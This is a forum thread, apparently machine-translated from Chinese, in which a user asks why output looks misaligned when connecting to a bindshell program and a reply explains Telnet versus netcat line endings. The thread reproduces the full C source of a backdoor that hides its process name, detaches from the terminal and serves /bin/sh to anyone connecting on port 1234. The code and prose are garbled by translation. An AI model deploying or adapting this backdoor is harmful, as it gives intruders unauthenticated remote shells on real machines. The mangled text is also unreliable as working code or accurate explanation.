Emm replies explaining Telnet and NC

Ask a question in bindshell. C! Please advise! Thank you!

After running the bindshell program, use another computer to access the listening port of the program. after entering the program, we can find that the positions of the output strings are not what we usually see, if LS-L is used, it will be more obvious! Their location is displayed according to certain rules, but this location is not normal! I don't know how to solve this problem?

How can I add code to solve this problem?

What knowledge should I use? Is it an output redirection?

I was just getting started with these things. I hope someone can give me some advice! Can you help me back up?

The code is from ayazero!

*
* Unknown author.
*/

# Define Port 1234
# Include <stdio. h>
# Include <signal. h>
# Include <sys/types. h>
# Include <sys/socket. h>
# Include <netinet/in. h>

Int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
Struct sockaddr_in serv_addr;
Struct sockaddr_in client_addr;

Int main (INT argc, char * argv [])
{
Int I;
For (I = 0; I <argc; I ++ ){
Memset (argv [I], 'x0', strlen (argv [I]);
};
Strcpy (argv [0], "th1s iz my 3l1t3 backd00r ");

Soc_des = socket (af_inet, sock_stream, ipproto_tcp );
If (soc_des =-1)
Exit (-1 );
Bzero (char *) & serv_addr, sizeof (serv_addr ));
Serv_addr.sin_family = af_inet;
Serv_addr.sin_addr.s_addr = htonl (inaddr_any );
Serv_addr.sin_port = htons (port );
Soc_rc = BIND (soc_des, (struct sockaddr *) & serv_addr, sizeof (serv_addr ));
If (soc_rc! = 0)
Exit (-1 );
If (Fork ()! = 0)
Exit (0 );
Setpgrp ();
Signal (sighup, sig_ign );
If (Fork ()! = 0)
Exit (0 );
Soc_rc = listen (soc_des, 5 );
If (soc_rc! = 0)
Exit (0 );
While (1 ){
Soc_len = sizeof (client_addr );
Soc_cli = accept (soc_des, (struct sockaddr *) & client_addr, & soc_len );
If (soc_cli <0)
Exit (0 );
Cli_pid = getpid ();
Server_pid = fork ();
If (server_pid! = 0 ){
Dup2 (soc_cli, 0 );
Dup2 (soc_cli, 1 );
Dup2 (soc_cli, 2 );
Execl ("/bin/sh", "sh", (char *) 0 );
Close (soc_cli );
Exit (0 );
}
Close (soc_cli );
}
}

How long is the code of the Telnetd service segment? How long is the bindshell code?
Bindshell only allows you to Execcommand without the complete remote logon protocol and supports terminal session control.

Envymask

Let us explain this question:

In the final analysis, the carriage return controller is still playing a strange role.

In addition, telnet.exe in windows is not intelligent enough.

In Windows, telnet.exe sends the command Terminator by default according to the standard Telnet protocol. It uses/R as the command Terminator and ends the command. When you press enter, only one/R character is sent as the end. However, in the preceding bindshell. C, the command Terminator is obviously not handled, And/N is used as the command Terminator. At this time, no matter what you enter, you will not see the expected results. You can only see something like the cursor flashing, because no/N is sent as the command Terminator, therefore, telnetd considers that the command has not been input, so the result is never displayed. The solution is to set the environment variable set crlffor Telnet. In this case, press enter in telnet.exe and send/R/n. Although the command can be executed successfully, you must press "; ", and the format is very messy. At last, a": Command not found "will pop up, as Lou pig said.

Why is this problem? To solve the first question, telnet.exe sends/R/N, bindshell. C will think that all commands before/n are included in/R, for example, input "ls" and actually send it to bindshell. the C string is actually "ls/R/N", bindshell. C considers/N as the command Terminator and removes/N, leaving "ls/R" rather than "ls". Of course, this command does not exist and will return: command not found. To achieve the purpose of the real LS command, you need to send "ls;", then sent to bindshell. the C string is "ls;/R/N". Except for the/n control character, the rest is "ls;/R". Why can the execution be successful now? It is because the two commands are separated by the ";" character in the middle. The "ls" and "/R" commands are executed separately. Of course, the first one is certainly successful, but the second "/R" command will not be successful, because there is no "/R" command, it is only a control character. Therefore, after the LS command returns successfully, it will be followed by a command not found. The second question is the result of returning the lsns. This is also because telnet.exe does not set bindshell. the returned result of C is well processed, bindshell. the end of the row returned by C is/n. I think if it is/R/N, the result should be printed to the console as expected.

The Telnet client in UNIX is more intelligent than that in Windows. It automatically determines whether the current session is using the Telnet protocol. If not, it sends/N as the command Terminator, then bindshell is merged. c. Everything goes like nothing.

NC is also a dummies, and it is also the command/N as the command Terminator, but with/N as the command Terminator, it also conforms to bindshell. C will, so whether in Windows or UNIX, using NC connection can achieve the expected results.

What I mentioned above is the result of my own packet capture analysis. If it is wrong, the table will throw me eggs and I will not pay for it.